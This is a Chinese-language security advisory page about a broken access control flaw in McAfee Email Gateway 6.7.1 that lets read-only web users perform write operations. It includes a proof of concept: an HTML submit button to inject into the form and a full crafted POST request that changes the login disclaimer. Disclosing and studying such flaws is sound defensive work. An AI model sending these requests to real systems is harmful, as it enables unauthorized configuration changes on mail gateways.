McAfee Email Gateway systemWebAdminConfig.do不安全访问控制漏洞

受影响系统:

McAfee Email Gateway 6.7.1

描述:


BUGTRAQ  ID: 40255

McAfee Email Gateway之前名为IronMail,是企业级的硬件邮件网关和管理平台。

McAfee Email Gateway的systemWebAdminConfig.do配置文件没有执行正确的权限检查,拥有只读权限的Web Access用户可以通过在服务器响应的Form字段中添加HTML代码或发送特制POST请求执行写权限操作。

<*来源:Nahuel Grisolía
  
  链接:http://www.cybsec.com/vuln/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken.pdf
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<tr class="buttonrow">
<td colspan="4" align="center">
<input type="submit" name="submitValue" value="Submit" title="Submit">
</td>
</tr>

POST /admin/systemWebAdminConfig.do?method=save&pageId=13&isMenuToggled=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: https://XXX.XXX.XXX.XXX:XXXXX/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&pageId=13
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: XXX.XXX.XXX.XXX:XXXXX
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:CTRGT=[YOUR COOKIE HERE]; CTSecureToken=[YOUR COOKIE HERE]; tabbedMenuSelected=13; itemToHighlight=https%3A//XXX.XXX.XXX.XXX%3AXXXXX/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26pageId%3D13; menusToExpand=ConfigurationMenu%2CCertificateManagementMenu%2CWebAdminConfigurationMenu%2C; JSESSIONID=[YOUR COOKIE HERE]
Content-Length: 2650
pageId=13&vipId=0&vipBased=0&rows%5B0%5D.attr_name=gui_log_level&rows%5B0%5D.attr_type=12&rows%5B0%5D.attr_validate=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attr_validate_str=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attr_depends=&rows%5B0%5D.is_mult_val=0&rows%5B0%5D.lang_tag_id_dv=2000003.displayValue&rows%5B0%5D.is_ascii_only=0&rows%5B0%5D.proc_id=90&rows%5B0%5D.attr_value_clone=4&rows%5B0%5D.attr_value=4&rows%5B1%5D.attr_name=gui_timeout&rows%5B1%5D.attr_type=2&rows%5B1%5D.attr_validate=%5B1-30%5D&rows%5B1%5D.attr_validate_str=%5B1-30%5D&rows%5B1%5D.attr_depends=&rows%5B1%5D.is_mult_val=0&rows%5B1%5D.lang_tag_id_dv=2001014.displayValue&rows%5B1%5D.is_ascii_only=0&rows%5B1%5D.proc_id=90&rows%5B1%5D.attr_value_clone=30&rows%5B1%5D.attr_value=30&rows%5B2%5D.attr_name=auto_refresh&rows%5B2%5D.attr_type=2&rows%5B2%5D.attr_validate=%5B1-30%5D&rows%5B2%5D.attr_validate_str=%5B1-30%5D&rows%5B2%5D.attr_depends=&rows%5B2%5D.is_mult_val=0&rows%5B2%5D.lang_tag_id_dv=2001017.displayValue&rows%5B2%5D.is_ascii_only=0&rows%5B2%5D.proc_id=90&rows%5B2%5D.attr_value_clone=10&rows%5B2%5D.attr_value=10&rows%5B3%5D.attr_name=enable_login_disclaimer_text&rows%5B3%5D.attr_type=5&rows%5B3%5D.attr_validate=&rows%5B3%5D.attr_validate_str=&rows%5B3%5D.attr_depends=&rows%5B3%5D.is_mult_val=0&rows%5B3%5D.lang_tag_id_dv=2001044.displayValue&rows%5B3%5D.is_ascii_only=0&rows%5B3%5D.proc_id=90&rows%5B3%5D.attr_value_clone=true&rows%5B3%5D.attr_value=true&rows%5B4%5D.attr_name=login_disclaimer_text&rows%5B4%5D.attr_type=19&rows%5B4%5D.attr_validate=&rows%5B4%5D.attr_validate_str=&rows%5B4%5D.attr_depends=enable_login_disclaimer_text&rows%5B4%5D.is_mult_val=0&rows%5B4%5D.lang_tag_id_dv=2001045.displayValue&rows%5B4%5D.is_ascii_only=0&rows%5B4%5D.proc_id=90&rows%5B4%5D.attr_value_clone=****************************
***************************%0D%0A%22NEW DISCLAIMER.%22%0D%0A*******************************************************&rows%5B4%5D.attr_value=*******************************************************%0D%0A%22NEW DISCLAIMER.%22%0D%0A*******************************************************&submitValue=Submit

建议:


厂商补丁:

McAfee
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mcafee.com/

发表评论?

0 条评论。

发表评论